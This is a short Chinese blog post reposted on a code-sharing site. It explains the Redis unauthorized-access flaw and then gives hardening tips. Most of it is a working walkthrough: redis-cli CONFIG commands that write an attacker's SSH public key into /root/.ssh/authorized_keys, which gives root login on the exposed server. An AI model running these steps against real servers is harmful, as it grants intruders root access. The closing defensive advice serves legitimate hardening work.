码迷,mamicode.com
首页 > 其他好文 > 详细

redis 未授权访问漏洞和防范

时间:2017-11-06 11:32:18      阅读:112      评论:0      收藏:0      [点我收藏+]

标签:redis

  1. 通过nmap扫描开放redis 6379端口

  2. 本机安装redis客户端,能连接远端redis数据库;(redis-cli)

  3. 本机创建私钥和公钥,ssh-keygen -t rsa 一路回车;会在/root/.ssh/下生成私钥文件id_rsa和公钥id_rsa.pub

  4. redis-cli -h 192.168.3.14 链接远程redis数据库

  5. [root@hack bin]# ./redis-cli -h 192.168.3.14

    192.168.3.14:6379> keys *

    1) "xxxx"

    192.168.3.14:6379> config set dir /root/.ssh/

    192.168.3.14:6379> config set dbfilename authorized_keys

    192.168.3.14:6379> set xxxx "\n\n\n 拷贝公钥文件内容(id_rsa.pub)\n\n\n"

    192.168.3.14:6379> save

  6. ssh root@192.168.3.14——发现可以直接登录了;


防范建议:

                redis4.0默认的redis.conf文件把6379默认绑定在127.0.0.1;这里设置允许谁能访问我的redis,不要开放0.0.0.0所有访问;

                redis4.0 的redis.conf里的protected-mode设置成yes;

                对redis启用密码认证 requirepass foobared

                限制ssh登录

                设置redis rename config

redis 未授权访问漏洞和防范

标签:redis

原文地址:http://12185273.blog.51cto.com/12175273/1979133

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!